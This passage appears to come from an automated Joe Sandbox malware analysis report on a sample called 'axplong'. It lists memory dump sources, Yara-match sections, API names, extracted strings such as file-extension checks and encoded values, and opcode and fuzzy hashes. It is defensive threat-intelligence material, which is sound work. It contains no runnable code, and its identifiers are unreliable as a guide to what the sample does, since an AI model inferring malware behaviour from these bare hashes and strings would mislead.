                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 38ac151e90e2919427b0fec7e7c69f58d31ea096eb714bea92998accb839b4fa
                    • Instruction ID: c343f697702cc6db59efb8e0083644b43b039967a3356b7a055446bd11b514b1
                    • Opcode Fuzzy Hash: 38ac151e90e2919427b0fec7e7c69f58d31ea096eb714bea92998accb839b4fa
                    • Instruction Fuzzy Hash: 39E08630641608BFDF36BB18C80CE887BEEEF92150F505404E89846131CF66DA82D640
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction ID: 7299e96b405fa2b808d56e12b94635ecf498fa12dbe5949f66dd3d89e48c5a9f
                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction Fuzzy Hash: 70E0EC72A55228EBCB25DB9CC94498AF7ECEB89A55B5544A6BA41D3250C270DE00C7D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 246122658369$9wGTaHilQw==$Gl==$Inhk$Xst=$invalid stoi argument$stoi argument out of range
                    • API String ID: 0-301961687
                    • Opcode ID: 380160dea48600edfe3aec0b314eb41d127fff95ebd1669e0b996112ccd66564
                    • Instruction ID: 96d5e6bd82ed7c476b3f0946c88b33e2753fa42c32b6bcdd6b63ac0370b917f3
                    • Opcode Fuzzy Hash: 380160dea48600edfe3aec0b314eb41d127fff95ebd1669e0b996112ccd66564
                    • Instruction Fuzzy Hash: 1902F170A00249EFEF15EFA8C844BDEBFB5BF14314F504198E885AB285D7799A84CF91
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: 56ebc9a41148741bddc49b6f5c2657cf5f9163ae2d4df2f0e4b50a8d55a60b63
                    • Instruction ID: bda98d4f05a174a247cb131aab52b238ee87456fad6ff52597a9eda928a10d59
                    • Opcode Fuzzy Hash: 56ebc9a41148741bddc49b6f5c2657cf5f9163ae2d4df2f0e4b50a8d55a60b63
                    • Instruction Fuzzy Hash: AF01C47BB04616653655605D9C01677BBDD8FE2AB4B2A006EFDC4FB2C2EE54D80251A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcast
                    • String ID:
                    • API String ID: 32384418-0
                    • Opcode ID: 90c835f932023d1c8eb1b906ca5b1da7f74a203f7f94572bacdccb3f16b312c1
                    • Instruction ID: 58d85cb037226518b5becf24932c871a2198c198d2087aa0244b14bf5401ac3f
                    • Opcode Fuzzy Hash: 90c835f932023d1c8eb1b906ca5b1da7f74a203f7f94572bacdccb3f16b312c1
                    • Instruction Fuzzy Hash: 40A1F3709412169FFB12DF68C948BAABBE8FF15354F0442B9E895DB281EB34E504CBD1
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction ID: fdd444a39991a8117033d745da7006f76b790534f3686c07a47cb7934b13ad0e
                    • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction Fuzzy Hash: A8B1257290068A9FEB15CF68C9807EEBBE9EF95340F1481ABD5C5FB241D6349902CB60
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Xtime_diff_to_millis2_xtime_get
                    • String ID:
                    • API String ID: 531285432-0
                    • Opcode ID: 0a528b4493ffe1a6f9b465aa67e2280d18e758b83f6e9f0827bae65ef4e306f3
                    • Instruction ID: dd707352bb8c37911a7eae19039c1e82f74d663c060617cfefc841ccc5c8f2aa
                    • Opcode Fuzzy Hash: 0a528b4493ffe1a6f9b465aa67e2280d18e758b83f6e9f0827bae65ef4e306f3
                    • Instruction Fuzzy Hash: F2215E71A4021AAFEF10EFA8C9819FEB7B8EF58714F500059F941A7254DB79AD018BA0